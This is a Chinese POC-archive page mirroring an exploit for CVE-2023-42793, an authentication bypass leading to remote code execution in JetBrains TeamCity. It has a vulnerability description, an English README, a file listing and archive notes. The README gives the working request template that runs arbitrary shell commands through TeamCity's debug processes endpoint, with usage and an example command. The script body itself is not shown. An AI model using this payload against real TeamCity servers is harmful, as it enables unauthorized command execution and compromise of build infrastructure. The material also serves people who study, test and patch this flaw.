POC详情: e447b3c259383fc3e406ae8e3c4149e24cd2e0bf

来源
关联漏洞
标题: JetBrains TeamCity 安全漏洞 (CVE-2023-42793)
描述:JetBrains TeamCity是捷克JetBrains公司的一套分布式构建管理和持续集成工具。该工具提供持续单元测试、代码质量分析和构建问题分析报告等功能。 JetBrains TeamCity 2023.05.4之前版本存在安全漏洞,该漏洞源于攻击者可以绕过身份验证,导致在 TeamCity 服务器上执行RCE 。
描述
teamcity-exploit-cve-2023-42793
介绍
# TeamCity Exploit Cve 2023 42793

A quick script to exploit the cve-2023-42793 bug. Some additional reading on the exploit can be found here:

https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793​

https://www.cnblogs.com/LittleHann/p/17843271.html​

This script adds in the ability to use "params" freely to execute commands after triggering the RCE bug:

`RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh&params=-c&params=${URLCMD}"`

## To run the script:

`Usage: <base_url> <port> <command>`

## Example:

`./TeamCity.sh blah.com 8111 "ls -lah"`

The original script is here, full credit needs to go to them: https://github.com/Zenmovie/CVE-2023-42793
文件快照

[4.0K] /data/pocs/e447b3c259383fc3e406ae8e3c4149e24cd2e0bf ├── [ 742] README.md └── [1.3K] TeamCity.sh 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。